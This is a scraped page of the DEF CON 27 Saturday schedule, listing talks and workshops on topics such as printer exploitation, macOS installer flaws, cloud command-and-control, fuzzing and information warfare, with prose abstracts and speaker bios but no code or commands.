Like a dear family relative who won't stop talking at Thanksgiving dinner, a backdoor exploit also talks to anyone who'll listen. Come listen to the Cyberlous Mrs. Maisel! She'll offer a satirical reflection on how we engage with technology in the Information Age and explain the basic historical principles that animate Russia's approach to information warfare. Topics covered include maskirovka (i.e., cover, concealment and deception), reflexive control, disinformation, and imitation, among others. Although a strategic objective of information warfare is to induce complacency with falsehoods, this presentation's unique style can help jolt the public's consciousness awake through its originality and bite.

J. Zhanna Malekos Smith is the Reuben Everett Cyber Scholar at Duke University Law School. Previously, she served as a Captain in the U.S. Air Force Judge Advocate General's Corps. Prior to military service, she was a post-doctoral fellow at the Belfer Center's Cyber Security Project at the Harvard Kennedy School. She holds a J.D. from the University of California, Davis; a B.A. from Wellesley College, where she was a Fellow of the Madeleine Korbel Albright Institute for Global Affairs; and is finishing her M.A. with the Department of War Studies at King's College London. She has presented her research at DEF CON, RSA, and ShmooCon, among others.


Return to Index    -    Add to    -    ics Calendar file

 

LBV - Flamingo - Carson City II Room - Saturday - 18:00-18:59


Title:
The Human Body's Promise: How Your Bare Hands can Defeat Physical Security


Return to Index    -    Add to    -    ics Calendar file

 

BHV - Planet Hollywood - Melrose 1-3 Rooms - Saturday - 14:30-15:15


2:30 PM: The L33T Shall Inherit the Cosmos
Speaker: J.J. Hastings

Abstract: The era of the astro-jock is over, no more men in tin cans taking orders from mission control. Staying alive off Earth will require the ability to thrive in an environment that requires constant adaptation. Fellow hacker and analogue astronaut J.J. Hastings argues that hackers are an ideal match to the space environment. Her talk suggests how we might become extra-terrestrial hackers and shares insights from her missions as a field researcher and analogue astronaut.

Speaker Bio: A biohacker since 2009, JJ Hastings co-founded London Biohackspace and BioQuisitive, and has the first garage to be PC-1 certified in Australia. An alumna of NYU, Harvard and Oxford with advanced degrees in Biology and Bioinformatics, she is an analogue astronaut and field researcher for NASA/JPL.

T: @HackerAstro

Return to Index    -    Add to    -    ics Calendar file

 

BHV - Planet Hollywood - Melrose 1-3 Rooms - Saturday - 15:15-15:59


3:15 PM: The Story of SICGRL Vulnerability
Speaker: Andrea Downing

Abstract: A massive security vulnerability was discovered which allowed PHI to be leaked from closed patient support groups on Facebook. In this session well discuss how a coalition of patients and security researchers faced this crisis and explore the need to develop a new model for collective data governance on social media.

Speaker Bio: Andrea Downing is a BRCA Community Data Organizer and founder of Brave Bosom. Along with Fred Trotter, Andrea discovered a security vulnerability in Facebook's Group product that affected all closed groups on Facebook.

T: @BraveBosom

Return to Index    -    Add to    -    ics Calendar file

 

SEV - Bally's Jubilee Tower - 3rd Floor - Saturday - 18:15-18:45


Saturday August 10 2019 1815 30 mins
The Voice Told Me To Do It
Corporate colors and logos characteristic of a brand are easily and freely accessed on the network. As consumers we have been advised to distrust an email with these identities.

Instead, the voice gives us confidence. When we need help, the voice is there. It is the first thing we hear when we call, it tells us how wonderful and beneficial it is to be associated with that brand. A voice that will never harm us, until now.

Identity spoofing is one of the most used social engineering formats to initiate major attacks. But what if cyber-criminals could go further? What would happen if someone could not only impersonate, but actually use the identity of an institution to make an attack on a national level? Is it possible to do this with a minimal investment or without capital? The answer is yes.

Daniel Isler: @Fr1endlyRATs
Daniel Isler is Security Consultant, Bachelor in Arts of Representation, Actor and Scenic Communicator and Voice Over Artist. With more than 10 years of experience as an academic in Acting classes at the University of Valparaíso, UNIACC University and Professional Institute Aiep. He also develops projects in the area of visual arts. With those who have participated in contemporary art festivals in Chile, Argentina, Portugal and Spain. Since 2015 he leads the Social Engineering team at Dreamlab Technologies.
Certifications / Competencies:
• Advanced Practical Social Engineering, Orlando, FL, United States.
• Usable Security, University of Maryland, United States.
• Improvisation Summer School, Keith Johnstone Workshop Inc. Calgary, Canada.
• French for foreign language, Université de Pau et des Pays de L’adour, Pau, France.
• Diploma in commercial speech, dubbing and neutral accentuation, Voces de Marca, Caracas, Venezuela.
• Diploma in Digital Photography, Arcos Professional Institute.
• Diploma in Audiovisual Language, UNIACC University.


Return to Index    -    Add to    -    ics Calendar file

 

RTV - Flamingo 3rd Floor - Laughlin I,II Rooms - Saturday - 16:00-16:59


Through the Looking Glass: Own the Data Center

The data center embodies the heart of many businesses on the Internet. It contains much of the information in a centralized location which provides a huge incentive for those who would wish harm. The data centers in the realm of Cloud may no longer contain just a single entity, but many individual tenants that attach to a common fabric. The Cisco Application Centric Infrastructure (ACI) aims to meet these needs with a multi-tenant, scalable fabric that interconnects physical hosts, VMs and containers. ACI is Cisco's answer to the centrally-managed Software Defined Network (SDN). The Application Policy Infrastructure Controller (APIC) and Nexus 9000 series switches form the brains and backbone of ACI.
A member of Cisco's Advanced Security Initiatives Group (ASIG) will demonstrate their findings during an evaluation of ACI and the APIC, more than three years before the BH2019 talk "APIC's Adventures in Wonderland." Step into the mind of an attacker and scan, probe, and interact with the network fabric to progress from an unauthenticated user to administrator and root of the data center switch fabric. Once inside the system, see how the APIC can be modified in a nearly undetectable manner to provide the attacker unfettered internal access to all the interconnected hosts and VMs in the data center. The target audience for this talk includes those with a technical interest in offensive discovery and secure product development. Participants will receive an overview of how a data center product is viewed in an offensive light.

About Chris McCoy: Chris is a technical leader in Cisco's Advanced Security Initiatives Group (ASIG) and published author of Security Penetration Testing, The Art of Hacking Series LiveLessons with Cisco Press. He has over 20 years of experience in the networking and security industry. He has a passion for computer security, finding flaws in mission-critical systems, and designing mitigations to thwart motivated and resourceful adversaries. He was formerly with Spirent Communications and the U.S. Air Force. Chris is CCIE certified (Emeritus) in the Routing & Switching and Service Provider tracks, which he has held for over 10 years. Twitter: @chris_mccoy



Return to Index    -    Add to    -    ics Calendar file

 

Meetups - Planet Hollywood - Mezzanine Stage - Saturday - 17:00-17:59


Title:
Tinfoil Hat Contest

No description available
Return to Index    -    Add to    -    ics Calendar file

 

CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Saturday - 13:00-12:59


Tiplines Today

No description available


Return to Index    -    Add to    -    ics Calendar file

 

CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Saturday - 11:00-10:59


TLS decryption attacks and back-doors to secure systems

No description available


Return to Index    -    Add to    -    ics Calendar file

 

PHVW - Bally's - Indigo Tower - 26th Floor - Saturday - 11:20-13:20


Tools? We Don’t Need No Stinkin’ Tools: Hands-on Hacking with Python

Jason Nickola, Directory of Technical Services, Pulsar Security
Wayne Marsh, Senior Software Engineer, Pulsar Security

The hacking world is full of fantastic tools, but the ability to write your own in order to customize and achieve new functionality is the real black magic. This workshop quickly builds from programming and python fundamentals to manual construction of real-world attack tactics and techniques. Prior hacking and programming skills are not required (although they help), but basic technical knowledge and an ahead-of-time review of introductory topics are highly recommended. Come in with nothing and leave with experience writing your own host and port scanner, reverse shell, packet parser, and more in a controlled (legal) environment.

Jason Nickola (Twitter: @chm0dx) is the Director of Technical Services at Pulsar Security where he also serves as Principle Security Consultant. He can frequently be found working with clients to develop creative solutions to red- (and increasingly blue-) team challenges. Passionate about both technology and the lifelong learning process, Jason enjoys enabling others via teaching and aiding in career development. Jason is a SANS instructor for SEC560: Network Penetration Testing and Ethical Hacking and holds the GIAC Security Expert, GXPN, GREM, and OSCP certifications among others.

Wayne Marsh (Twitter: @infogroke) is a Security Consultant and the Senior Software Engineer at Pulsar Security where he spends his time programming, architecting enterprise products, and breaking into the occasional network. His varied career has involved television and satellite broadcast systems, games development, and marketing before finally focusing on the infosec industry in recent years, where he realized that the common thread in all of these areas of development is security. He loves both obsolete and new, as well as increasingly unfashionable genres of music. Wayne’s security credentials include OSCP, GPYC, GXPN, and GCIA.


Return to Index    -    Add to    -    ics Calendar file

 

CPV - Planet Hollywood - Celebrity 1,2 Ballrooms - Saturday - 10:00-09:59


Towards Usable Dining Cryptographer Networks with Howl

No description available


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 1 - Saturday - 16:30-16:50


Unpacking Pkgs: A Look Inside Macos Installer Packages And Common Security Flaws

Saturday at 16:30 in Track 1
20 minutes | Demo

Andy Grant Technical Vice President, NCC Group

We are hackers, we won't do as you expect or play by your rules, and we certainly don't trust you. JAR files are really ZIPs...unzip them! So are Microsoft's DOCX, XLSX, PPTX, etc. Let's open them up! macOS applications (.app "files") are really directories you can browse?! Sweet, let's do that.

Less well known but similarly prevalent are Flat Package Mac OS X Installer (.pkg) files. These are actually XAR archives that, among other things, contain many plaintext files (including shell, Perl, and Python scripts) as cpio files compressed using gzip.

In this presentation I'll walk you through extracting the contents of these installer packages, understanding their structure, and seeing how they work while highlighting where security issues can come up. To drive the point home of what can go wrong, I'll include examples of serious security issues I've seen in the wild and show you how they can be exploited to elevate privileges and gain code/command execution.

After this talk, .pkg files will no longer be opaque blobs to you. You'll walk away knowing tools and techniques to tear them open, understand how to evaluate what they're really doing on your computer, and a methodology for finding bugs in them. As a final bonus, I'll include a subtle trick or two that can be used on red teams.

Andy Grant
Andy Grant is a Technical Vice President for NCC Group. While at NCC Group, Andy has worked on a wide-variety of security assessment and advisory projects. He has performed numerous application assessments on mobile (Android, iOS, WP7), desktop (OS X/macOS, Windows, Linux), and web platforms. He has also performed many internal and external network penetration tests and widget/third-party platform reviews. Andy has worked with small tech start-ups, small and large software development groups, and large financial institutions. Andy has a BS in Computer Science and an Advanced Computer Security Certificate from Stanford University.

Twitter: @andywgrant


Return to Index    -    Add to    -    ics Calendar file

 

RCV - Planet Hollywood - Celebrity 5 Ballroom - Saturday - 11:55-12:30


LIGHTENING TALK

Use Responsibly: Recon Like an insider threat for Best User Training ROI

1155 - 1230


Return to Index    -    Add to    -    ics Calendar file

 

CLV - Flamingo 3rd Floor - Reno I Room - Saturday - 13:45-14:25


Speaker: Rod Soto

Twitter: @rodsoto

Abstract: This presentation shows how to use Splunk to provide the analyst with a comprehensive vision of AWS/GCP/Azure security posture. Presenters will outline how to ingest the audit data provided by open source tool Cloud Security Suite into Splunk to analyze cloud vulnerability, harden multi-cloud deployments and visualize multi-cloud threat surface. Presenters will also demonstrate use cases based on Splunk knowledge objects (Tables, Dashboards, Alerts, Field extractions, Lookups, etc), in order to take advantage of the information provided by various supporting tools like Scout2 and G-Scout projects for cloud API auditing.

About Rod: Rod Soto has over 15 years of experience in information technology and security. Currently working as Principal Security Research Engineer at Splunk. He has spoken at ISSA, ISC2, OWASP, DEFCON, Hackmiami, Bsides and also been featured in Rolling Stone Magazine, Pentest Magazine, Univision and CNN. Rod Soto was the winner of the 2012 BlackHat Las vegas CTF competition and is the founder and lead developer of the Kommand && KonTroll competitive hacking Tournament series.


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 4 - Saturday - 16:00-16:30


Vacuum Cleaning Security—Pinky and the Brain Edition

Saturday at 16:00 in Track 4
20 minutes | Exploit

jiska TU Darmstadt, Secure Mobile Networking Lab

clou (Fabian Ullrich)

Data collected by vacuum cleaning robot sensors is highly privacy-sensitive, as it includes details and metadata about consumers’ habits, how they live, when they work or invite friends, and more. Connected vacuum robots are not as low-budget as other IoT devices and vendors indeed invest into their security. This makes vacuum cleaning robot ecosystems interesting for further analysis to understand their security mechanisms and derive takeaways.

In this talk we discuss the security of the well-protected Neato and Vorwerk ecosystems. Their robots run the proprietary QNX operating system, are locally protected with secure boot, and use various mechanisms that ensure authentication and encryption in the cloud communication. Nonetheless, we were able to bypass substantial security components and even gain unauthenticated privileged remote execution on arbitrary robots. We present how we dissected ecosystem components including a selection of vacuum robot firmwares and their cloud interactions.

jiska
Jiska has a M.Sc. in IT-Security. She is a PhD student at the Secure Mobile Networking Lab (TU Darmstadt) since May 2014. Her main research interest are wireless physical layer security and reverse engineering. You might also know her embroidery projects or game shows from past CCC events.

Twitter: @seemoolab

clou (Fabian Ullrich)
Fabian has a M.Sc. in IT-Security. He is working as a researcher and analyst at ERNW. His main research interests are full stack IoT and web application security. In his free time, Fabian likes to capture some flags.


Return to Index    -    Add to    -    ics Calendar file

 

RGV - Flamingo - 3rd Floor - Carson City II - Saturday - 17:00-17:59


Title:
Verbal Steganography Workshop

Verbal Steganography Workshop with Four Suits Co. Space will be limited. Sign-up is available here
Return to Index    -    Add to    -    ics Calendar file

 

RGV - Flamingo - 3rd Floor - Carson City II - Saturday - 16:00-16:59


Title:
Verbal Steganography

Verbal Steganography
Four Suits Co. presents a talk (and demonstration) of live stenographic communication. Boiled down to its simplest form that means all the ways for two or more people to secretly, and in an analog way, communicate with each other. This includes physical and verbal codes, as well as memory systems and shortcuts that allow large amounts of information to be remembered and transferred from person to person.
Return to Index    -    Add to    -    ics Calendar file

 

ETV - Flamingo - 3rd Floor - Reno II Room - Saturday - 10:00-10:59


Title:
Void If Removed: Securing Our Right TO Repair


Return to Index    -    Add to    -    ics Calendar file

 

DC - Planet Hollywood - Firesides Lounge - Saturday - 22:15-22:59


We Hacked Twitter… And the World Lost Their Sh*t Over It!

Saturday at 22:15 in Firesides Lounge
45 minutes

Mike Godfrey Penetration Tester, INSINIA Security

Matthew Carr Penetration Tester, INSINIA Security

In December 2018 INSINIA Security was involved in one of the biggest hacking stories of the year. A number of “celebrities”, including Louis Theroux, Eamon Holmes and more, logged into their Twitter accounts just after Christmas to find a Tweet, from their account, saying:

“This account has been temporarily hijacked by INSINIA SECURITY”.

The tweet immediately directed people to our blog post, and the compromised accounts retweeted INSINIA’s Tweet, saying:

“This account is now under the control of @InsiniaSRT. Luckily, this has been H4CK3D to highlight an important vulnerability. The user of this account has NOT lost access to it, no data compromised and is NOT under attack. See how it was done…”.

What we did was simple. We used spoof texts to Tweet from these accounts. We NEVER had access to these accounts. We could never read DM’s. We simply passively controlled these accounts with no opportunity of getting confidential data in return.

So what did the hacking community, journalists and commentators do?! They LOST THEIR SH*T OVER IT!

“It’s unethical” “It’s a crime” “Computer Misuse Act counts for security researchers too!” “You guys are total f*cking idiots!

These are the types of things we’d heard from our peers. But why was the backlash so bad? In this talk, INSINIA explains why it was done, how it was done, how people reacted and how research can be released quickly and responsibly… Without always getting the warm reception you might expect!

Mike Godfrey
Mike Godfrey, Director of INSINIA Security, started life as a “hacker” before he had hit his teens. With a professional background in Electro-technical / Electro-mechanical Engineering and almost 20 years’ experience in building and breaking computers.

Mike offers a unique perspective when it comes to varied and multi-vector attacks and is regarded as one of the UK’s most capable multi-skilled Cyber Security Specialists, gaining notoriety in the Cyber Security industry for using elements of different skills, both on hard and soft surfaces, to carry out highly technical and often highly intricate electronic attacks. One of these attacks includes hacking Costco’s high security Sentry display safe with nothing more than a magnet and a sock! This research was utilised and referenced by @Plor in his talk at DEF CON 25 – “Popping a Smart Gun”. Mike has also been lucky enough to become a DEF CON speaker in 2018, one of the proudest moments of his life!

Mike works as a Cyber Security contributor for the BBC, LBC, Channel 4 and was the Ethical Hacker who discovered the TalkTalk and O2 data breach stories.

Twitter: @MikeGHacks

Matthew Carr
Matthew's previous roles including Senior Penetration Tester and Researcher at SecureLink, Europe's largest managed security services provider and Operational Security Specialist at Ikea overseeing worldwide Operational Security as part of a Specialist Team.

Matthew regularly speaks at industry events and lectures offensive security at Malmö's Technology University in Sweden.

Matthew spent over 3 years as part of an R&D team building intrusion detection software, a secure cloud platform, SIEM tools and other security software, Matthew is not only a competent red teamer but also a valuable asset to any blue team.

Matthew works as a Cyber Security contributor for the Telegraph, Talk Radio and SVT.

Twitter: @sekuryti


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 1 - Saturday - 10:00-10:45


Weaponizing Hypervisors to Fight and Beat Car and Medical Devices Attacks

Saturday at 10:00 in Track 1
45 minutes | Demo, Tool

Ali Islam CEO, Numen Inc.

Dan Regalado (DanuX) CTO, Numen Inc

Historically, hypervisors have existed in the cloud for efficient utilization of resources, space, and money. The isolation feature is one of the reasons hypervisors are heavily moving to other ecosystems, like Automobiles, so that for example, if an Infotainment crashes, it does not affect other sensitive ECUs like ADAS. Blackberry QNX and AGL announced the use of hypervisors in their deployments on Cars.

The trending is real, but there is a big challenge! Most of the systems in Cars and Medical devices run on ARM, plus, protection at the hypervisor level is still limited. So, is it possible to have a framework that runs at the hypervisor level, able to monitor at the OS level and most important, capable to identify and kill threats coming into the monitored devices?

During this talk we will walk you through the steps needed to setup a framework running on Xilinx ZCU102 board able to monitor ARM-based devices and to kill malicious threats identified. Also will discuss challenges on syscall monitoring, single-stepping limitations, techniques to stay stealthy, techniques to detect and kill traditional malware seen in enterprise like Ransomware, Heap Exploits and capabilities on VM Escape attacks and feasibilty to detect Spectre-like exploits.

Ali Islam
Ali Islam Khan is the Chief Executive Officer (CEO) and Co-Founder of Numen Inc. He is also an avid C programmer and has developed the core set of Numen’s Virtual Machine Introspection (VMI) capabilities. Before quitting his job to work full time on Numen, Ali was Director R&D at FireEye where he was leading the R&D efforts for FireEye’s flagship email and network products. He is the founding member of FireEye Labs where he invented & developed some of the key detection technologies used in FireEye products today. Ali has multiple patents to his name and has over 13 years’ experience in a wide range of cyber security disciplines, including cryptography, malware analysis, cyber-espionage and product development. He has successfully created and led global teams from scratch. Ali has spoken at conferences such as RSA and worked with various government agencies such as DHS, KISA on intelligence sharing efforts to counter nation-state level threats.

Khan holds an MBA from UC Berkeley and a Master’s degree in network security from Monash University, Australia. He is an AUSAID scholar and the recipient of the prestigious Golden Key Award.

Twitter: @Ali_Islam_Khan
LinkedIn: https://www.linkedin.com/in/aliislam/

Dan Regalado (DanuX)
Daniel Regalado aka DanuX is the CTO and Co-Founder of Numen Inc. He is a Mexican security researcher with more than 17 years in the scene. He has worked reversing malware and exploits at Symantec Security Response Team and FireEye Labs and lately focused on IoT threats at Zingbox. He is credited with the discovery of most of the ATM malware worldwide. He is the co-author of famous book Gray Hat Hacking and he likes to present his discoveries in major security conferences like RECon, RSA, DEF CON IoT/Car Hacking villages, BSIDES.

Twitter: @danuxx
LinkedIn: https://www.linkedin.com/in/daniel-regalado-200aa414/


Return to Index    -    Add to    -    ics Calendar file

 

BTVT - Flamingo - 3rd Floor- Savoy Room - Saturday - 16:30-16:59


When A Plan Comes Together: Building A SOC A-Team

Saturday 16:30, Savoy Ballroom, Flamingo (Blue Team Village) (30M)

@markaorlando started his security career in 2001 as a Security Analyst, and since then has been both fighting for blue team resources and trying to automate them out of a job. He has built, assessed, and managed security teams at the Pentagon, the White House, the Department of Energy, global Managed Security Service Providers, and numerous financial sector and Fortune 500 clients. Short on patience and attention, Mark is constantly working on new projects to improve defensive security through automation and other short cut-y things so defenders can be more agile and creative. While Director of Operations at Foreground Security, he designed and launched a Managed Detection and Response (MDR) service offering and helped to invent an automated cyber threat hunting technology, both of which were later acquired. He enjoys teaching and learning from others but spends far more time doing the latter.

The security industry is facing a severe talent shortage, but the threats are growing in number and sophistication. Finding talent, honing it to meet your specific mission, and retaining it have become immense challenges for modern operations teams. In this talk, we’ll explore these challenges and discuss creative ways to find, train, and equip a security operations “A-Team”.


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 3 - Saturday - 12:00-12:45


Why You Should Fear Your “mundane” Office Equipment

Saturday at 12:00 in Track 3
45 minutes | Demo, Tool, Exploit

Daniel Romero Managing Security Consultant, NCC Group

Mario Rivas Senior Security Consultant, NCC Group

The security of common enterprise infrastructure devices such as desktops and laptops has advanced over the years through incremental improvements in operating system and endpoint security. However, security controls for network devices such as enterprise printers are often ignored and thus present a greater potential for exploitation and compromise by threat actors seeking to gain a persistent foothold on target organisations.

In order to assess the current state of mainstream enterprise printer product security and to challenge common assumptions made about the security of these devices, which sit on key parts of enterprise networks and process sensitive data, we set out on a vulnerability and exploitation research project of six known vendors. We were able to find remote vulnerabilities in all printers tested through various attack vectors, revealing a large number of 0-day vulnerabilities in the process.

In this talk we walk through the entire research engagement, from initial phases such as threat modelling to understand printer attack surfaces to the development of attack methodologies and fuzzing tools used to target printer-specific protocols and functions. Besides of remarking important vulnerabilities found and their respective CVE’s, proof of concept exploits showing how it is possible to gain full control of printers and all of the data they manage will be presented. This will show how to use enterprise printers as a method of persistence on a network, perhaps to exfiltrate sensitive data or support C2 persistence on Red Team engagements.

We also address a number of challenges that researchers can face when performing vulnerability research on devices such as printers and how we used different techniques to overcome these challenges, working with limited to no debugging and triage capabilities. We also present mitigations that printer manufacturers can implement in order to reduce printer attack surfaces and render exploitation more difficult.

Daniel Romero
Daniel is currently a security consultant and researcher at NCC Group. During his career he has worked in interesting security projects, always trying to “break” as much as possible. In the last years Daniel has mostly been focused on embedded devices / IoT and all what surrounds it such as hardware, code review, reverse engineering, fuzzing or exploiting.

Twitter: @daniel_rome

Mario Rivas
Mario is a penetration tester and security consultant at NCC Group in Madrid. His interests revolve around all areas of computer security, always trying to learn new things, and specially enjoying writing tools during the process to make his life a bit easier.

Twitter: @Grifo


Return to Index    -    Add to    -    ics Calendar file

 

DL - Planet Hollywood - Sunset 1 - Saturday - 10:00 - 11:50


WiFi Kraken – Scalable Wireless Monitoring

Saturday from 10:00 – 11:50 in Sunset 1 at Planet Hollywood
Audience: Offense, Defense, Hardware

Mike Spicer

This tool is the culmination of lessoned learned during the last 3 years of wireless monitoring at DEF CON using tools like the #WiFiCactus. This demo will show you the software and hardware needed to build a robust wireless monitoring sensor network that is capable of capturing everything up to 802.11ac including Bluetooth. This demo will include a distributed capture network that will take captured data from multiple nodes and send it back to a single capture server. This project will show you how to use advanced features of Kismet Wireless to increase the amount of data you capture. Wireless threats and attacker tactics will be discussed and identified as they happen in the environment. Data analytic techniques will be demonstrated and discussed using tools like Wireshark, NetworkMiner and PCAPinator.

http://palshack.org/def-con-27-demolab/

Mike Spicer
d4rkm4tter is a mad scientist hacker who likes to meddle with hardware and software. He is particularly obsessed with wireless. He has a degree in computer science from Southern Utah University which he has put to use building and breaking a wide array of systems. These include web application pentesting, wireless monitoring and tracking as well as good old fashioned reverse engineering. He is the creator of the #WiFiCactus and has been seen presenting Demolabs at DEF CON and DEF CON China Beta. He is a Kismet cultist and active in the wireless and wardriving communities.


Return to Index    -    Add to    -    ics Calendar file

 

Workshops - ( Sold Out ) - Flamingo - Lower Level - Lake Mead II - Saturday - 10:00-13:59


Writing custom backdoor payloads using C#

Saturday, 1000-1400 in Flamingo, Lake Mead II

Mauricio Velazco Threat Management Team Lead

Olindo Verrillo Hacker

This workshop aims to provide attendees hands-on experience on writing custom backdoor payloads using C# for the most common command and control frameworks including Metasploit, Powershell Empire and Cobalt Strike. The workshop consists in 7 lab exercises; each of the exercises goes over a different technique that leverages C# and .NET capabilities to obtain a reverse shell on a victim Windows host. The covered techniques include raw shellcode injection, process injection, process hollowing, runtime compilation, parent pid spoofing, antivirus bypassing, etc. At the end of this workshop attendees will have a clear understanding of these techniques both from an attack and defense perspective.

Skill Level Intermediate

Prerequisites: Basic to intermediate programming/scripting skills. Prior experience with C# helps bot not required.

Materials: Laptop with virtualization software. A Windows virtual machine A Kali Linux Virtual Machine.

Max students: 40

Registration: https://www.eventbrite.com/e/writing-custom-backdoor-payloads-using-c-lake-mead-ii-tickets-63439591526
(Opens 8-Jul-19)

Mauricio Velazco
Mauricio Velazco (@mvelazco) is a Peruvian, Infosec geek who started his career as a penetration tester and jumped to the blue team 7 years ago. He currently leads the Threat Management team at a financial services organization in New York where he focuses on threat detection/hunting and adversary simulation. Mauricio has presented and hosted workshops at conferences like Defcon, Derbycon and BSides. He also holds certifications like OSCP and OSCE.

Olindo Verrillo
Olindo Verrillo is a Senior Security Engineer who straddles the line between blue and red. He currently focuses most of his attention on purple teaming and detection engineering. Olindo has worked as Senior consultant, performing both offensive and defensive engagements for numerous Fortune 500 companies.


Return to Index    -    Add to    -    ics Calendar file

 

PHVW - Bally's - Indigo Tower - 26th Floor - Saturday - 13:40-15:40


Writing Wireshark Plugins for Security Analysis

Nishant Sharma, R&D Manager, Pentester Academy
Jeswin Mathai, Security Researcher, Pentester Academy

Network traffic always proves to be a gold mine when mined with proper tools. There are various open source and paid tools to analyze the traffic but most of them either have predefined functionality or scalability issues or one of a dozen other problems. And, in some cases when we are dealing with non-standard protocols, the analysis becomes more difficult. But, what if we can extend our favourite traffic analysis tool Wireshark to accommodate our requirements? As most people know, Wireshark supports custom plugins created in C and Lua which can be used to analyze or dissect the packets. In this workshop, we will learn the basics of Wireshark plugins and move on to create different types of plugins to perform dissection of non-standard protocol, provide macro statistics, detect attacks etc. We will use examples of older and newer protocols (including non-standard ones) to understand the plugin workflow and development.

Nishant Sharma (Twitter: @wifisecguy) is an R&D Manager at Pentester Academy and Attack Defense. He is also the Architect at Hacker Arsenal where he leads the development of multiple gadgets for WiFi pentesting such as WiMonitor, WiNX and WiMini. He also handles technical content creation and moderation for Pentester Academy TV. He has 7+ years of experience in information security field including 5+ years in WiFi security research and development. He has presented/published his work at Blackhat USA/Asia, DEF CON China, Wireless Village, IoT village and Demo labs (DEFCON USA). Prior to joining Pentester Academy, he worked as a firmware developer at Mojo Networks where he contributed in developing new features for the enterprise-grade WiFi APs and maintaining the state of art WiFi Intrusion Prevention System (WIPS). He has a Master's degree in Information Security from IIIT Delhi. He has also published peer-reviewed academic research on HMAC security. His areas of interest include WiFi and IoT security, AD security, Forensics and Cryptography.

Jeswin Mathai (Twitter: @jeswinmathai) is a Researcher at Pentester Academy and Attack Defense. He has presented/published his work at DEF CON China, Blackhat Arsenal and Demo labs (DEFCON). He has a Bachelor's degree from IIIT Bhubaneswar. He was the team lead at InfoSec Society IIIT Bhubaneswar in association with CDAC and ISEA, which performed security auditing of government portals, conducted awareness workshops for government institutions. He was also the part of team Pied Piper who won Smart India Hackathon 2017, a national level competition organized by GoI. His area of interest includes Malware Analysis and Reverse Engineering, Cryptography, WiFi security and Web Application Security.


Return to Index    -    Add to    -    ics Calendar file

 

CLV - Flamingo 3rd Floor - Reno I Room - Saturday - 15:05-15:50


Speaker: Erick Galinkin

Twitter: @erickgalinkin

Abstract: What happens when attackers start taking advantage of whitelisted APIs as a form of obfuscated command and control? Companies both large and small are moving workloads to the cloud and are very concerned with how to secure their resources which actually live in AWS, GCP, and Azure. However, they don't address how enabling this access changes their internal attack surface and weakens their defenses.

In this talk, we demonstrate that attackers no longer have any reason to rely on conventional CNC, being able to outsource their costs and infrastructure management to the likes of Slack, Github, Pastebin, Dropbox, Google, and social media sites. Using these sorts of techniques, URL blacklisting becomes obsolete, IDS becomes less effective, and attackers no longer have to waste their time writing domain generation algorithms.

Specifically, I will demo a proof-of-concept malware which uses multiple SaaS services, social networks, and more conventional "cloud infrastructure" (S3) that would be extremely difficult to mitigate generically with today's IPS solutions, and we discuss how the same techniques can be used by red teams and attackers to quietly maintain persistence and exfiltrate data.

About Erick: Erick is a security researcher at Netskope focused on malicious SaaS usage and attacks against Microsoft Azure. He previously was previously at Cisco's Talos group where he focused on hunting exploit kits. As part of his academic research at Johns Hopkins University, he conducts research on neural networks, verifiable computing, and computational complexity.


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 1 - Saturday - 11:00-11:45


Your Car is My Car

Saturday at 11:00 in Track 1
45 minutes | Demo, Tool, Exploit

Jmaxxz

For many of us, our cars are one of the largest purchases we will ever make. In an always connected world it is natural that we would want to have the convenience of being able to remotely monitor our vehicles: to do everything from remind ourselves exactly where exactly we parked, verify we locked our vehicle, or even remote start it so it will be warmed up (or cooled down) when we get in. There are a variety of vendors offering aftermarket alarm systems that provide these conveniences and offer a peace of mind. But how much can we trust the vendors of these systems are protecting access to our cars in the digital domain? In this talk, Jmaxxz will tell the story of what he found when he looked into one such system.

Jmaxxz
Jmaxxz works as a software engineer, but is a hacker by passion. He is best known for his work on the August Smart Lock (DEF CON 24 “Backdooring the Frontdoor”). In recent years IoT devices have been the focus of his work. He participated in the IoT village zero day track at DEF CON 24 and DEF CON 25. After enduring several polar vortexes, he decided it was probably time to investigate an IoT remote car starter.

twitter: @jmaxxz Website: jmaxxz.com


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 3 - Saturday - 14:00-14:45


Zero bugs found? Hold my Beer AFL! How To Improve Coverage-Guided Fuzzing and Find New 0days in Tough Targets

Saturday at 14:00 in Track 3
45 minutes | Demo, Tool, Exploit

Maksim Shudrak Security Researcher

Fuzzing remains to be the most effective technique for bugs hunting in memory-unsafe programs. Last year, hundreds of security papers and talks on fuzzing have been published and dozens of them were focused on adapting or improving American Fuzzy Lop in some way. Attracting with its simplicity and efficiency, AFL is the number one choice for the vast majority of security researchers. This high popularity means that hunting for bugs with AFL or a similar tool is becoming less and less fruitful since many projects are already covered by other researchers. It is especially hard when we talk about a project participating in Google OSS-Fuzz program which utilizes AFL to generate a half-trillion test cases per day.

In practice, this means that we can not blindly rely on AFL anymore and should search for better fuzzing techniques. In order to overcome this challenge, we need to understand how AFL and similar fuzzers work and be able to use their weaknesses to find new 0days. This talk is aimed to discuss these weaknesses on real examples, explain how we can do fuzzing better and release a new open-source fuzzer called Manul.

Manul is a high-scalable coverage-guided parallel fuzzer with the ability to search for bugs in open source and black box binaries on Windows and Linux. Manul was able to find 10 0-days in 4 widely-used projects that have been extensively tested by AFL. These vulnerabilities were not found by chance, but by analyzing and addressing issues exist in AFL. Authors will show several of the most critical vulnerabilities and explain why AFL overlooked them.

This talk will be interested for experienced hackers, who are willing to improve their bug hunting capabilities, as well as for new researchers, who are making their first steps on the thorny trail of bug hunting.

Maksim Shudrak
Maksim is a security researcher and vulnerability hunter in open-source and blackbox applications. In the past, he had experience working on dynamic binary instrumentation framework DynamoRIO, developing extremely abstract Windows OS emulator for malware analysis at IBM Research as well as writing sophisticated fuzzer to search for vulnerabilities in machine code. The latter was so exciting that he defended PhD on this topic. Today, he works on Red Team side at large cloud-based software company.

Maksim has spoken at various security conferences around the world such as DEF CON, Positive Hack Days, Virus Bulletin and BSides SF.

Twitter: @Mshudrak
LinkedIn: https://www.linkedin.com/in/mshudrak


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 4 - Saturday - 12:00-12:45


